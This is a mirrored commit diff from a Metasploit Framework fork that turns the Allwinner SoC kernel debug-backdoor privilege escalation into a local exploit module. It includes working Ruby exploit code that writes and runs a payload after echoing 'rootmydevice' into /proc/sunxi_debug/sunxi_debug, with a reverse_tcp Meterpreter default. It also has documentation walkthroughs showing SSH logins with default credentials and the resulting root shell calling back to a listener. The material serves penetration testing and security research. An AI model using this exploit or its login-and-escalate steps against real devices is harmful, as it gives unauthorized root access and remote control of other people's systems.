infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #7355, allwinner post to local exploit conversion

bug/bundler_fix
Brent Cook 2016-10-08 21:38:54 -05:00
parent e074669406 cba297644e
commit b77a910205
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
3 changed files with 106 additions and 110 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

71
documentation/modules/exploit/multi/local/allwinner_backdoor.md Normal file
View File

@ -0,0 +1,71 @@
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
Vulnerable OS: all OS images available for Orange Pis,
any for FriendlyARM's NanoPi M1,
SinoVoip's M2+ and M3,
Cuebietech's Cubietruck +
Linksprite's pcDuino8 Uno
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
## Usage
To use this module, you need a vulnerable device. An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
- `use auxiliary/scanner/ssh/ssh_login`
```
msf auxiliary(ssh_login) > set username orangepi
username => orangepi
msf auxiliary(ssh_login) > set password orangepi
password => orangepi
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
rhosts => 192.168.2.21
msf auxiliary(ssh_login) > exploit
[*] 192.168.2.21:22 SSH - Starting bruteforce
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- `use exploit/multi/local/allwinner_backdoor`
```
msf exploit(allwinner_backdoor) > set verbose true
verbose => true
msf exploit(allwinner_backdoor) > set session 1
session => 1
msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp
payload => linux/armle/mettle/reverse_tcp
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(allwinner_backdoor) > check
[*] The target appears to be vulnerable.
msf exploit(allwinner_backdoor) > exploit
```
## Successful exploitation:
```
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[+] Backdoor Found, writing payload to /tmp/odzVx.elf
[*] Max line length is 65537
[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[+] Escalating
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 192.168.2.248
OS : Ubuntu 14.04 (Linux 3.4.39)
Architecture : armv7l
Meterpreter : armle/linux
```

93
documentation/modules/post/multi/escalate/allwinner_backdoor.md
View File

@ -1,93 +0,0 @@
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
Vulnerable OS: all OS images available for Orange Pis,
any for FriendlyARM's NanoPi M1,
SinoVoip's M2+ and M3,
Cuebietech's Cubietruck +
Linksprite's pcDuino8 Uno
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
## Usage
To use this module, you need a vulnerable device. An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
- `use auxiliary/scanner/ssh/ssh_login`
```
msf auxiliary(ssh_login) > set username orangepi
username => orangepi
msf auxiliary(ssh_login) > set password orangepi
password => orangepi
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
rhosts => 192.168.2.21
msf auxiliary(ssh_login) > exploit
[*] 192.168.2.21:22 SSH - Starting bruteforce
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- `use post/multi/escalate/allwinner_backdoor`
```
msf post(allwinner_backdoor) > set verbose true
verbose => true
msf post(allwinner_backdoor) > set session 1
session => 1
msf post(allwinner_backdoor) > run
```
## Successful exploitation:
```
[+] Backdoor found, exploiting.
[+] Privilege Escalation Successful
[*] Post module execution completed
msf post(allwinner_backdoor) > sessions -i 1
[*] Starting interaction with 1...
2013564244
uHvwyYtCTXENEYdrCoKdgVxTpKlbnqsW
true
RUVRnPJFFgVpuqEiYXdtXpwdDZxVwZPS
TitlDmvnSvINczARsMAKdajpRoXEohXO
0
RtBPRSiAsiGoFatKQVukpjIjGBpJdXqq
id
uid=0(root) gid=0(root) groups=0(root),27(sudo),29(audio),1001(orangepi)
^Z
Background session 1? [y/N] y
```
## Graceful exit on non-vulnerable devices:
```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username pi
username => pi
msf auxiliary(ssh_login) > set password raspberry
password => raspberry
msf auxiliary(ssh_login) > set rhosts basementpi
rhosts => basementpi
msf auxiliary(ssh_login) > exploit
[*] 192.168.2.80:22 SSH - Starting bruteforce
[+] 192.168.2.80:22 SSH - Success: 'pi:raspberry' 'uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),106(netdev),996(gpio),997(i2c),998(spi),999(input) Linux basementpi 4.1.19-v7+ #858 SMP Tue Mar 15 15:56:00 GMT 2016 armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:36438 -> 192.168.2.80:22) at 2016-05-17 22:19:57 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > use post/multi/escalate/allwinner_backdoor
msf post(allwinner_backdoor) > set verbose true
verbose => true
msf post(allwinner_backdoor) > set session 1
session => 1
msf post(allwinner_backdoor) > run
[-] Backdoor /proc/sunxi_debug/sunxi_debug not found.
[*] Post module execution completed
```

52
modules/post/multi/escalate/allwinner_backdoor.rb → modules/exploits/multi/local/allwinner_backdoor.rb
View File

@ -5,9 +5,12 @@
require "msf/core" require "msf/core"
class MetasploitModule < Msf::Post class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File include Msf::Post::File
include Msf::Post::Linux::Priv include Msf::Post::Linux::Priv
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -31,6 +34,11 @@ class MetasploitModule < Msf::Post
], ],
"Platform" => [ "android", "linux" ], "Platform" => [ "android", "linux" ],
"DisclosureDate" => "Apr 30 2016", "DisclosureDate" => "Apr 30 2016",
"DefaultOptions" => {
"payload" => "linux/armle/mettle/reverse_tcp"
},
"Privileged" => true,
"Arch" => ARCH_ARMLE,
"References" => "References" =>
[ [
[ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"], [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
@ -38,26 +46,36 @@ class MetasploitModule < Msf::Post
"https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"], "https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
[ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"] [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
], ],
"SessionTypes" => [ "shell", "meterpreter" ] "SessionTypes" => [ "shell", "meterpreter" ],
'Targets' =>
[
[ 'Auto', { } ]
],
'DefaultTarget' => 0,
)) ))
end end
def run def check
backdoor = "/proc/sunxi_debug/sunxi_debug" backdoor = '/proc/sunxi_debug/sunxi_debug'
if file_exist?(backdoor) if file_exist?(backdoor)
vprint_good "Backdoor found, exploiting." Exploit::CheckCode::Appears
cmd_exec("echo rootmydevice > #{backdoor}") else
if is_root? Exploit::CheckCode::Safe
print_good "Privilege Escalation Successful" end
report_vuln( end
host: session.session_host,
name: self.name, def exploit
refs: self.references, backdoor = '/proc/sunxi_debug/sunxi_debug'
info: 'Escalated to root shell via Allwinner backdoor' if file_exist?(backdoor)
) pl = generate_payload_exe
else
print_error "Privilege Escalation FAILED" exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
end vprint_good "Backdoor Found, writing payload to #{exe_file}"
write_file(exe_file, pl)
cmd_exec("chmod +x #{exe_file}")
vprint_good 'Escalating'
cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
else else
print_error "Backdoor #{backdoor} not found." print_error "Backdoor #{backdoor} not found."
end end